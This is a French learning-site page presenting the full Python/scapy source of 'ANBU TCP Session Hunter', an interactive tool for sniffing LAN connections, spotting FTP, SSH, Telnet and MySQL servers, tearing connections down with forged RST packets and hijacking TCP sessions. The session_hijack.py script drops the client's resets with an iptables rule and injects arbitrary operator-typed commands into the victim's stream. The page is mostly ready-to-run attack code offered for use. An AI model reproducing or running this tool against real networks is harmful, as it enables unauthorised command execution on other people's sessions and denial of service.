ANBU TCP Session Hunter

ANBU TCP Session Hunter

ANBU est un projet en python que j'ai devellopé il y a quelque temps, qui permet de réaliser les deux attaques vu dans ce cours de manière plus évolué.
J'ai réalisé une video de démonstration (qui sert également de didacticiel) à cette adresse:
ANBU TCP Session Hunter Demo

anbu.py:

# ANBU :: TCP Session Hunter
# Author: St0rn
#anbu.py
#
#argv[1] = interface
#
#!usr/bin/env/python

import os
import sys
import string
import thread
from scapy.all import *

execute = []
ip_src = []
port_src = []
ip_dst = []
port_dst = []

def intro():
 print("                          )     )()) ( )     (")  
 print("                       ((((_)(  ((_)  )((_)    ) ")  
 print("                        ) _ )  _((_)((_)_  _ ((_)") 
 print("                        (_)_(_)| | | | _ )| | | |") 
 print("                           / _   | .` | | _ | |_| |")
 print("                         /_/ \_ |_|\_| |___/ \___/")
 print("                             TCP SESSION HUNTER")
                             
print("


")

def list_remp(p):
 if p.haslayer(IP) and p.haslayer(TCP):
  if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst:
   ip_src.append(p[IP].src)
   port_src.append(p[TCP].sport)
   ip_dst.append(p[IP].dst)
   port_dst.append(p[TCP].dport)

def list_remp_filter(p, ip):
 if p.haslayer(IP) and p.haslayer(TCP):
  if p[IP].src == ip or p[IP].dst == ip:
   if p[IP].src not in ip_src or p[TCP].sport not in port_src or p[IP].dst not in ip_dst or p[TCP].dport not in port_dst:
    ip_src.append(p[IP].src)
    port_src.append(p[TCP].sport)
    ip_dst.append(p[IP].dst)
    port_dst.append(p[TCP].dport)
 
def sniff_connect(device):
  try:
   sniff(count=0, prn=list_remp, iface=device)
  except:
   print "
             Can't Launch sniffer...
"
   sys.exit()

def sniff_connect_filter(device, ip):
  try:
   sniff(count=0, prn= lambda p : list_remp_filter(p,ip), iface=device)
  except:
   print "
             Can't Launch sniffer...
"
   sys.exit()

os.system("clear")
intro()

if len(sys.argv) < 2:
 print "
Usage: anbu.py <interface>
"
else:
 while 1:
    inp = raw_input("
           > ")
    if string.lower(inp) == "help" or string.lower(inp) == "h":
      print "
             help, h:              Show Options"
      print "             server:               Server Discovery"
      print "             sniff:                sniff all Connexions"
      print "             sniff <ip>:           sniff cibled IP  :: ex: sniff 192.168.1.34"
      print "             ls:                   List Connexions"
      print "             rst <nb>:             Reset Connexion  :: ex: rst 2"
      print "             hijack <nb>:          Hijack Connexion :: ex: hijack 2"
      print "             clear:                Clear CLI"
      print "             quit, exit, q, e:     Exit"
      
    elif string.lower(inp) == "ls":
     print "
"
     if len(ip_src) > 1:
      for i in range(len(ip_src)):
       print "             ["+str(i)+"] " + ip_src[i] + ":" + str(port_src[i]) + " > " + ip_dst[i] + ":" + str(port_dst[i]) 
     else:
      print "             Aucune entrees"
    elif string.lower(inp) == "empty":
     ip_src = []
     port_src = []
     ip_dst = []
     port_dst = []
    elif string.lower(inp) == "clear": 
     os.system("clear")
     intro()
    elif string.lower(inp) == "q" or string.lower(inp) == "quit" or string.lower(inp) == "e" or string.lower(inp) == "exit":
     sys.exit()
    elif string.lower(inp) == "sniff":
     thread.start_new_thread(sniff_connect, (sys.argv[1], ))
    elif string.lower(inp) == "server":
     os.system("xterm -e python check_server.py &")
    else:
     execute = inp.split(" ")
     if string.lower(execute[0]) == "sniff":
      thread.start_new_thread(sniff_connect_filter, (sys.argv[1],execute[1], ))
     elif string.lower(execute[0]) == "rst":
      num = execute[1]
      cmd = "xterm -e python rst_hijack.py " + ip_dst[int(num)] + " " + str(port_dst[int(num)]) + " " + str(ip_src[int(num)]) + " &"
      os.system(cmd)
     elif string.lower(execute[0]) == "hijack":
      num = execute[1]
      cmd = "xterm -e python session_hijack.py " + ip_src[int(num)] + " " + str(ip_dst[int(num)]) + " " + str(port_dst[int(num)]) + " " + sys.argv[1] + " &"
      os.system(cmd)
     else:
      print "
             Not an option!"

check_server.py:

# ANBU :: TCP Session Hunter Module: Server Discovery
# Author: St0rn
#check_server.py
#
#!usr/bin/env/python

import os
from scapy.all import *

ip = []
port = []

def check_interest_server(a):
  if a[IP].src not in ip or a[TCP].sport not in port:
   ip.append(a[IP].src)
   port.append(a[TCP].sport)
   if a[TCP].sport == 21:
     print "[+] " + a[IP].src + " Is a FTP Server on Port 21"
   elif a[TCP].sport == 22:
     print "[+] " + a[IP].src + " Is a SSH Server on port 22"
   elif a[TCP].sport == 23:
     print "[+] " + a[IP].src + " Is a Telnet Server on port 23"
   elif a[TCP].sport == 513:
     print "[+] " + a[IP].src + " Is a Rlogin Server on port 513"
   elif a[TCP].sport == 3306:
     print "[+] " + a[IP].src + " Is a MySQL Server on port 3306"

os.system("clear")
print "-> Server Discovery
"
print " "
sniff(count=0, prn = lambda a : check_interest_server(a), lfilter=lambda(f): f.haslayer(TCP) and f.haslayer(IP))

rst_hijack.py:

# ANBU :: TCP Session Hunter Module: RST Hijacking
# Author: St0rn
#rst_hijack.py
# 
# argv[1] = remote_host ; argv[2] = remote_port ; argv[3] = target
#
#!usr/bin/env/python
     
from scapy.all import *
import sys
import os
   
filtre = "host " + sys.argv[1] + " and port " + sys.argv[2]
os.system("clear")

print "
Waiting..."
print " "
     
def rst_hijack(p):
   
 if p[IP].src==sys.argv[1] and p[IP].dst==sys.argv[3]:
    print "
[+] Connection Found!"
    print " "
    print "[+] It's time to blow this shit!"
     
    ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
    ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl, proto=p[IP].proto, id=29321)
    tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs,
reserved=p[TCP].reserved, flags="R", window=p[TCP].window, options=p[TCP].options)
    reset = ether/ip/tcp
    sendp(reset, verbose=0)
    print "

 Press ENTER to continue
"
    raw_input()
    sys.exit()
       
sniff(count=0,prn = lambda p : rst_hijack(p),filter=filtre,lfilter=lambda(f): f.haslayer(IP) and f.haslayer(TCP))

session_hijack.py:

# ANBU :: TCP Session Hunter Module: Session Hijacking
# Author: St0rn
#session_hijack.py
# 
# argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] = port_serveur ; argv[4] = iface
#
#!usr/bin/env/python

from scapy.all import *
import sys
import os

filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0"

os.system("clear") 

try:
 os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP") 
 print("
 [+] iptables rule added for client RST packets
")
except:
 print("
 [-] iptables rule don't added for client RST packets
")

def hijack_session(p):
  print(" ")
  
  ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
  ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
  tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

  hijack = ether/ip/tcp/"echo 1337
"
  sendp(hijack, verbose=0)

def perm_session(p):
  os.system("clear")
  if p[Raw].load:
   sys.stdout.write(p[Raw].load + " ")

  cmd = sys.stdin.read()

  ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
  ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
  tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)

  packet = ether/ip/tcp/(cmd+"
")
  sendp(packet, verbose=0)
  
 
print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"
")

try:
 sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
except:
 print(" [-] Can't launch sniffer :'(
")

while 1:
 try:
  sniff(count = 1, prn=perm_session, filter=filtre,  lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
 except:
  print(" [-] can't launch sniffer :'(
")

NCNT

NoCry-NoTeacher est un site de partage et d'apprentissage à tout ce qui attrait à l'informatique

TCP Session Hijacking

ANBU TCP Session Hunter